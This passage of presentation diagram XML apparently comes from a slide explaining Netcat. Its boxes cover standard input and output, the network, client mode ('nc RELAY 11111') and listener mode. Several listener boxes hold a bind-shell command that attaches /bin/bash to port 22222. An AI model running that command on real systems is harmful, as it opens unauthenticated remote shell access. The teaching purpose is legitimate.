            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="4434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D7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="621"/>
          <a:ext cx="2590800" cy="1522757"/>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The Network</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="44600" y="45221"/>
        <a:ext cx="2501600" cy="14335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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1"/>
          <a:ext cx="3962400" cy="914399"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="26782" y="26783"/>
        <a:ext cx="3908836" cy="860835"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1809750" y="937261"/>
          <a:ext cx="342899" cy="411479"/>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5400000">
        <a:off x="1857756" y="971551"/>
        <a:ext cx="246887" cy="240029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1371601"/>
          <a:ext cx="3962400" cy="2133596"/>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Netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Listener </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>(Waits for Connection)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="62491" y="1434092"/>
        <a:ext cx="3837418" cy="2008614"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1809750" y="3528058"/>
          <a:ext cx="342899" cy="411479"/>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5400000">
        <a:off x="1857756" y="3562348"/>
        <a:ext cx="246887" cy="240029"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3962398"/>
          <a:ext cx="3962400" cy="914399"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="26782" y="3989180"/>
        <a:ext cx="3908836" cy="8608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D7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="621"/>
          <a:ext cx="2590800" cy="1522757"/>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The Network</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="44600" y="45221"/>
        <a:ext cx="2501600" cy="14335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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="4434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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="4434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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="44343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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
        <a:ext cx="1725008" cy="44343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ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1228"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="15024"/>
        <a:ext cx="1725008" cy="443435"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="484031"/>
          <a:ext cx="176635" cy="211962"/>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5400000">
        <a:off x="812711" y="501694"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="707769"/>
          <a:ext cx="1752600" cy="1099061"/>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Client Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t> RELAY 11111</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32190" y="739959"/>
        <a:ext cx="1688220" cy="1034681"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="787982" y="1818606"/>
          <a:ext cx="176635" cy="211962"/>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rot="-5400000">
        <a:off x="812711" y="1836269"/>
        <a:ext cx="127178" cy="123645"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2042344"/>
          <a:ext cx="1752600" cy="471027"/>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Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="13796" y="2056140"/>
